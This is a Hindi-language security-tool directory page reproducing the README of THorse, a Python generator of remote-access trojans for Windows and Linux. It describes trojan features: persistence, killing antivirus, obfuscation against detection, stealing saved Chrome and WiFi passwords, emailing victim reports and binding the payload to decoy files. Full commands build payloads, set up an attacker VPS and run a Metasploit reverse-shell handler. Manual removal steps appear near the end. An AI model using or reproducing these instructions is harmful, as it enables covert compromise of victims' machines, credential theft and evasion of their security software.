Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
thorse — THorse Python 3 में लिखा गया Windows/Linux सिस्टम के लिए एक RAT (रिमोट एडमिनिस्ट्रेटर ट्रोजन) जनरेटर है। | Kitploit
उपकरण/GitHubGitHub/pushpenderindia/thorse
पासवर्ड क्रैकिंगशोषण फ्रेमवर्कपेलोड जनरेशनस्थायित्व तंत्रआईडीएस/आईपीएस से बचनापोस्ट-शोषणकमांड एंड कंट्रोलरिमोट एक्सेस ट्रोजनएंटी-बॉट
GitHubpushpenderindia/thorse

thorse

THorse Python 3 में लिखा गया Windows/Linux सिस्टम के लिए एक RAT (रिमोट एडमिनिस्ट्रेटर ट्रोजन) जनरेटर है।

614126512 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

THorse

THorse एक RAT (Remote Administrator Trojan) जनरेटर है जो Windows/Linux सिस्टम के लिए Python 3 में लिखा गया है।

root@kitploit:~
                    यह छोटा python स्क्रिप्ट वास्तव में शानदार काम कर सकता है।

अस्वीकरण

:computer: यह प्रोजेक्ट केवल अच्छे उद्देश्यों और व्यक्तिगत उपयोग के लिए बनाया गया था।

यह सॉफ्टवेयर "जैसा है" किसी भी प्रकार की वारंटी के बिना प्रदान किया जाता है। आप इस सॉफ्टवेयर का उपयोग अपने जोखिम पर कर सकते हैं। उपयोग की पूरी जिम्मेदारी अंतिम उपयोगकर्ता की है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

विशेषताएं

  • Windows/Linux पर काम करता है
  • ईमेल के माध्यम से नए पीड़ित को सूचित करें
  • अज्ञात रहता है
  • रूट या एडमिन विशेषाधिकारों की आवश्यकता नहीं है
  • स्थायित्व
  • ईमेल के माध्यम से पीड़ित के पीसी के स्क्रीनशॉट भेजता है
  • हमलावर को पूर्ण Meterpreter एक्सेस देता है
  • ट्रोजन बनाने के लिए कभी भी metesploit स्थापित करने की आवश्यकता नहीं है
  • शून्य निर्भरता के साथ निष्पादन योग्य बाइनरी बनाता है
  • उन्नत कार्यक्षमता के साथ लगभग 5mb का छोटा पेलोड बनाता है
  • संकलन से पहले पेलोड को अस्पष्ट करता है, जिससे कुछ और एंटीवायरस को बायपास करता है
  • उत्पन्न पेलोड Base64 के साथ एन्कोड किया जाता है, जिससे पेलोड को रिवर्स इंजीनियर करना अत्यंत कठिन हो जाता है
  • पीड़ित पीसी पर एंटीवायरस को मारता है और Windows सुरक्षा केंद्र को निष्क्रिय करने का प्रयास करता है
  • पेलोड उत्पन्न करने के लिए शानदार रंगीन इंटरफ़ेस
समर्थित पुनर्प्राप्तियाँ, सहेजे गए पासवर्ड कहाँ से प्राप्त करने का प्रयास करता है :
Chrome ब्राउज़र
WiFi

नोट: कस्टम स्टीलर को कोड किया गया है, यह LaZagne पर निर्भर नहीं करता है

परीक्षित किया गया

Kali) Kali Linux - रोलिंग एडिशन

Windows) Windows 10

Windows) Windows 8.1 - प्रो

Windows) Windows 7 - अल्टीमेट

मेटास्प्लॉइट का उपयोग करके उत्पन्न मीटरप्रेटर पेलोड की निम्नलिखित सीमाएँ हैं:-

  • बैकडोर निष्पादित करने से पहले Metasploit Listener चलाना होगा
  • बैकडोर स्वयं स्थायी नहीं होता, हमें बैकडोर को स्थायी बनाने के लिए पोस्ट एक्सप्लॉइटेशन मॉड्यूल का उपयोग करना होता है। और पोस्ट एक्सप्लॉइटेशन मॉड्यूल का उपयोग केवल सफल एक्सप्लॉइटेशन के बाद ही किया जा सकता है।
  • जब भी नए सिस्टम पर पेलोड निष्पादित होता है तो हमें सूचित नहीं करता

हम सभी जानते हैं कि Meterpreter पेलोड कितना शक्तिशाली है, लेकिन फिर भी इससे बना पेलोड संतोषजनक नहीं है।

इस पेलोड जनरेटर की निम्नलिखित विशेषताएं हैं जो आपको इस पायथन स्क्रिप्ट का अच्छा विचार देंगी:-

  • विंडोज में स्थायी होने के लिए Windows रजिस्ट्री का उपयोग करता है।
  • लिनक्स सिस्टम में भी स्थायी होने का प्रबंधन करता है।
  • पेलोड LINUX और WINDOWS दोनों पर चल सकता है।
  • पूर्ण एक्सेस प्रदान करता है, क्योंकि metasploit listener का उपयोग किया जा सकता है और साथ ही कस्टम listener का समर्थन करता है (आप अपना स्वयं का Listener बना सकते हैं)
  • जब भी नए सिस्टम पर पेलोड चलता है, पूर्ण सिस्टम जानकारी के साथ ईमेल सूचना भेजता है।
  • 1 मिनट या उससे भी कम समय में पेलोड उत्पन्न करता है।
  • सभी मीटरप्रेटर पोस्ट एक्सप्लॉइटेशन मॉड्यूल का समर्थन करता है।
  • पेलोड विंडोज और लिनक्स दोनों सिस्टम पर बनाया जा सकता है।

पूर्वापेक्षाएँ

  • पायथन 3.X
  • कुछ बाहरी मॉड्यूल

कृपया ध्यान दें:

विंडोज में, कृपया paygen.py में Pyinstaller पथ निर्दिष्ट/सेट करें [पंक्ति 14]

डिफ़ॉल्ट पथ यह है : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

इसे अपने सिस्टम के अनुसार बदलें

Linux में उपयोग कैसे करें

root@kitploit:~
# निर्भरताएँ स्थापित करें 
$ Install latest python 3.x

# /opt निर्देशिका पर जाएं (वैकल्पिक)
$ cd /opt/

# इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git

# रिपॉजिटरी में जाएं
$ cd thorse

# निर्भरताएँ स्थापित करना
$ bash installer_linux.sh

# यदि installer_linux.sh निष्पादित करते समय कोई त्रुटि आती है, तो installer_linux.py का उपयोग करके स्थापित करने का प्रयास करें
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# पेलोड/RAT बनाना
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# स्थायी होने के लिए कस्टम समय के साथ पेलोड/RAT बनाना
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें  --icon icon/pdf.ico

VPS में उपयोग कैसे करें (अनुशंसित)

root@kitploit:~
# 1. एक VPS सेटअप करें, आप किसी भी VPS प्रदाता जैसे Digital Ocean, Linode, AWS आदि से Ubuntu VPS खरीद सकते हैं

# 2. SSH का उपयोग करके अपने VPS से कनेक्ट करें
$ ssh username@ip_address

# 3. अपने Linux VPS को अपडेट करें
$ sudo apt update

# 4. Kali Linux रिपॉजिटरी जोड़ें
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. gnupg पैकेज स्थापित करें
$ sudo apt install gnupg

# 6. Kali पब्लिक कीज़ जोड़ें
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. VPS अपडेट करें
$ sudo apt update

# 8. Kali प्राथमिकता सेट करें
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. VPS अपडेट करें
$ sudo apt update

# 10. VPS में Metasploit Framework स्थापित करें
$ sudo apt install -t kali-rolling metasploit-framework

# नोट: उपरोक्त चरण केवल एक बार करने की आवश्यकता है

# 11. pip3 स्थापित करें
$ sudo apt install python3-pip

# 12. इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. रिपॉजिटरी में जाएं
$ cd thorse

# 14. निर्भरताएँ स्थापित करना
$ bash installer_linux.sh

# 15. यदि installer_linux.sh निष्पादित करते समय कोई त्रुटि आती है, तो installer_linux.py का उपयोग करके स्थापित करने का प्रयास करें
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# पेलोड/RAT बनाना (यदि आप Windows के लिए RAT कंपाइल करना चाहते हैं, तो Windows मशीन पर RAT बनाएं और VPS का उपयोग RAT को दूरस्थ रूप से नियंत्रित करने के लिए करें)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# स्थायी होने के लिए कस्टम समय के साथ पेलोड/RAT बनाना
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें  --icon icon/pdf.ico

Windows में उपयोग कैसे करें

root@kitploit:~
# निर्भरताएँ स्थापित करें 
$ Install latest python 3.x

# इस रिपॉजिटरी को क्लोन करें
$ git clone https://github.com/PushpenderIndia/thorse.git

# रिपॉजिटरी में जाएं
$ cd thorse

# निर्भरताएँ स्थापित करना
$ python -m pip install -r requirements.txt

# paygen.py को टेक्स्ट एडिटर में खोलें और पंक्ति 15 कॉन्फ़िगर करें, Pyinstaller पथ सेट करें, डिफ़ॉल्ट पथ इस प्रकार है:-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe") 

# सहायता मेनू प्राप्त करना
$ python paygen.py --help

# पेलोड/RAT बनाना
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# कस्टम AVKiller के साथ पेलोड/RAT बनाना [डिफ़ॉल्ट रूप से, Kill_Targets में टनों ज्ञात एंटीवायरस जोड़े जाते हैं]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# पेलोड/RAT को वैध फ़ाइल [कोई भी फ़ाइल .exe, .pdf, .txt आदि] के साथ बाइंड करके बनाना
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

नोट: आप आइकन फ़ोल्डर से हमारे कस्टम आइकन का भी उपयोग कर सकते हैं, बस उन्हें इस तरह उपयोग करें  --icon icon/pdf.ico

नोट:- दुर्भावनापूर्ण फ़ाइल dist/ फ़ोल्डर के अंदर, technowhorse/ फ़ोल्डर में सहेजी जाएगी

Msfconsole का उपयोग करके कनेक्शन स्थापित करना

  • आपको अपने सिस्टम पर Metasploit-Framework स्थापित करने की आवश्यकता है
  • अनुशंसित सेटिंग्स, आप लाइन 2 में किसी अन्य पेलोड के साथ इसका परीक्षण कर सकते हैं
root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

अपडेट कैसे करें

  • स्वचालित रूप से अपडेट करने के लिए updater.py चलाएं या इस GitHub repo से नवीनतम Zip डाउनलोड करें
  • नोट: updater.py का उपयोग करने के लिए Git स्थापित होना चाहिए

उपलब्ध आर्गुमेंट्स

  • वैकल्पिक आर्गुमेंट्स

नोट : या तो -w/--windows या -l/--linux निर्दिष्ट होना चाहिए

  • आवश्यक आर्गुमेंट्स

नए स्क्रीनशॉट:

सहायता प्राप्त करना

पेलोड उत्पन्न करना

इन पुरानी छवियों को भी देखें

~पुराने स्क्रीनशॉट:

सहायता प्राप्त करना

paygen.py स्क्रिप्ट चलाना

जब RAT चलता है, तो यह स्थायी होने के लिए रजिस्ट्री जोड़ता है

अपनी प्रतिलिपि बनाता है और इसे Roming के अंदर सहेजता है

RAT द्वारा भेजी गई रिपोर्ट

पीड़ित पीसी से अधिसूचना प्राप्त करना

योगदानकर्ता:

वर्तमान में इस रिपॉजिटरी का रखरखाव मेरे (Pushpender Singh) द्वारा किया जा रहा है। लेकिन यदि आप योगदानकर्ता बनना चाहते हैं, तो कुछ अच्छी सुविधा जोड़ें और एक पुल रिक्वेस्ट बनाएं, मैं इसकी समीक्षा करूंगा और इसे इस रिपॉजिटरी में मर्ज कर दूंगा।

सभी योगदानकर्ताओं के पुल रिक्वेस्ट स्वीकार किए जाएंगे यदि उनका पुल रिक्वेस्ट इस रिपॉजिटरी के लिए योग्य है।

TODO

  • नई सुविधाएँ जोड़ें
  • GUI में योगदान करें

Windows में TechNowHorse हटाना:

विधि 1:

  • स्टार्ट पर जाएं, regedit टाइप करें और पहला प्रोग्राम चलाएं, यह रजिस्ट्री एडिटर खोलेगा।
  • निम्नलिखित पथ पर नेविगेट करें Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run वहाँ winexplorer नामक एक प्रविष्टि होनी चाहिए, इस प्रविष्टि पर राइट क्लिक करें और Delete चुनें।
  • अपने उपयोगकर्ता पथ > AppData > Roaming पर जाएं, आपको “explorer.exe” नामक एक फ़ाइल दिखाई देगी, यह RAT है, राइट क्लिक > Delete।
  • सिस्टम को पुनरारंभ करें।

विधि 2:

  • संक्रमित सिस्टम में "RemoveTHorse.bat" चलाएं और फिर वर्तमान चल रही दुर्भावनापूर्ण फ़ाइल को रोकने के लिए पीसी को पुनरारंभ करें।

Linux में TechNowHorse हटाना:

  • किसी भी टेक्स्ट एडिटर के साथ ऑटोस्टार्ट फ़ाइल खोलें, ऑटोस्टार्ट फ़ाइल पथ: ~/.config/autostart/xinput.desktop

  • इन 5 पंक्तियों को हटाएं:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • नोट: destination_file_name वह दुर्भावनापूर्ण फ़ाइल का नाम है जो आपने अपने TrojanHorse को -o पैरामीटर का उपयोग करके दिया था

  • अपने सिस्टम को रीबूट करें और फिर इस नीचे दिए गए पथ पर संग्रहीत दुर्भावनापूर्ण फ़ाइल को हटा दें

  • गंतव्य पथ, जहाँ TrojanHorse संग्रहीत है : ~/.config/xnput

योगदानकर्ता

  • समर्पित योगदानकर्ता सूची: योगदानकर्ता

Pushpender Singh

:computer:

किसी भी प्रकार का योगदान स्वागत है!

नोट: यदि आपको योगदानकर्ताओं की सूची में होना चाहिए लेकिन हम आपको भूल गए, तो कृपया हमें बताएं!

TODO सूची

  • अपनी खुद की सुविधा सुझाएं : )
  • GUI विकास
  • बग फिक्स
  • और ब्राउज़र पासवर्ड चोर जोड़ें
टूल डाउनलोड करें
  • हमलावर पक्ष पर: पेलोड बनाते समय, स्क्रिप्ट स्वचालित रूप से लापता निर्भरताओं का पता लगाती है और उन्हें स्थापित करती है
  • दुर्भावनापूर्ण फ़ाइल में कस्टम आइकन जोड़ने में सक्षम
  • बिल्ट-इन बाइंडर जो निष्पादन योग्य को किसी भी फ़ाइल [.pdf, .txt, .exe आदि] से बाइंड कर सकता है, फ्रंट एंड पर वैध फ़ाइल और बैक-एंड पर सेवा के रूप में दुर्भावनापूर्ण कोड चलाता है।
  • सिस्टम पर पहले से चल रहे इंस्टेंस की जांच करता है, यदि चल रहा इंस्टेंस मिलता है, तो केवल वैध फ़ाइल निष्पादित की जाती है [मल्टीपल इंस्टेंस प्रोहिबिटर]।
  • हमलावर Linux सिस्टम का उपयोग करके Windows/Linux दोनों OS के लिए बना/संकलित कर सकता है, लेकिन Windows मशीन का उपयोग करके केवल Windows निष्पादन योग्य बना/संकलित कर सकता है
  • पीड़ित सिस्टम से सहेजे गए पासवर्ड प्राप्त करता है और हमलावर को भेजता है।
  • शॉर्ट हैंडफुल हैंडविवरण
    -h--helpयह सहायता संदेश दिखाएं और बाहर निकलें
    -k KILL_AV--kill_av KILL_AVएंटीवायरसकिलर : उस AV के .exe को निर्दिष्ट करें जिसे मारने की आवश्यकता है। उदा:- --kill_av cmd.exe
    -t TIME_IN_SECONDS--persistence TIME_PERSISTENT__ सेकंड के बाद स्थायी हो जाता है। डिफ़ॉल्ट=10
    -w--windowsWindows निष्पादन योग्य उत्पन्न करें।
    -l--linuxLinux निष्पादन योग्य उत्पन्न करें।
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfAutoBinder : वैध फ़ाइल का पथ निर्दिष्ट करें। [समर्थित OS : Windows]
    -s--steal-passwordपीड़ित मशीन से सहेजा गया पासवर्ड चुराएं [समर्थित OS : Windows]
    -d--debugवायरस को फोरग्राउंड में चलाएं
    शॉर्ट हैंडफुल हैंडविवरण
    --icon ICONआइकन पथ निर्दिष्ट करें, दुर्भावनापूर्ण फ़ाइल का आइकन [नोट : .ico होना चाहिए]
    --ip IP_ADDRESSरिपोर्ट भेजने के लिए ईमेल पता।
    --port PORT--ip तर्क में दिए गए IP पते का पोर्ट।
    -e EMAIL--email EMAILरिपोर्ट भेजने के लिए ईमेल पता।
    -p PASSWORD--password PASSWORD-e तर्क में दिए गए ईमेल पते का पासवर्ड।
    -o OUT--out OUTआउटपुट फ़ाइल नाम।